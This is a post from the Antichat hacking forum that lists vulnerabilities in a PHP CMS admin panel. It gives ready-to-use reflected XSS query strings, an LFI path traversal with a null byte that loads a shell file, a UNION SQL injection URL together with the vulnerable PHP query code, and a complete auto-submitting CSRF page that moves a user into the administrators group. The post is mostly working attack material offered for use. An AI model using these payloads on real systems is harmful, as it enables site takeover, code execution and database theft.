Форум АНТИЧАТ - Показать сообщение отдельно

Пассивная XSS

Цитата:

/index.php?view=price&do=search&query=%22onMouseMov e=%22javascript:alert();%22

Цитата:

/admin/index.php?view=components&do=config&id=21&opt=edit &item_id=1%22%3E%3Cscript%3Ealert();%3C/script%3E

LFI

Нужны права админа.

Т.к. при ../ - слэш убираеться, юзаем ..\
/admin/index.php?view=..%5C..%5Cshell.txt%00
(В корне лежал файл shell.txt с phpinfo(); ), код выполнился.

SQL Inj
Нужны права админа.

/admin/index.php?view=components&do=config&id=21&opt=edit &item_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+

PHP код:

if (isset($_SESSION['editlist'])){ $id = array_shift($_SESSION['editlist']); if (sizeof($_SESSION['editlist'])==0) { unset($_SESSION['editlist']); } else { $ostatok = '(На очереди: '.sizeof($_SESSION['editlist']).')'; } } else { $id = $_REQUEST['item_id']; } $sql = "SELECT * FROM cms_user_autoawards WHERE id = $id LIMIT 1"; $result = dbQuery($sql) ; if (mysql_num_rows($result)){ $mod = mysql_fetch_assoc($result); }

CSRF exploit:
Код HTML:
<html>
<title> Fs3M Chm0k3 v 3Nt0m ch4te! =* </title>
<div style='display: none'>
<form action="http://shop/admin/index.php?view=users&do=edit&id=21" method="post" enctype="multipart/form-data" name="addform" id="addform">
<input name="login" type="text" id="logininput" value="Login" />
<input name="nickname" type="text" id="login" value="Xenker"/>
<input name="email" type="text" id="nickname" value="abcd@localhost"/>
<input name="pass" type="password" id="pass"/>
<input name="pass2" type="password" id="pass2"/>
<select name="group_id" id="group_id"><option value="2" >Администраторы</option></select>
<input name="is_locked" type="radio" value="0" checked="checked" />
 Нет
<input name="do" type="hidden" id="do" value="update" />
<input name="add_mod" type="submit" id="add_mod" value="Сохранить профиль" />
</div>
<script>
document.addform.submit();
</script>
</html>

Примечание:
Там очень много SQL Inj, но, долбанное ЧПУ недаёт свободу!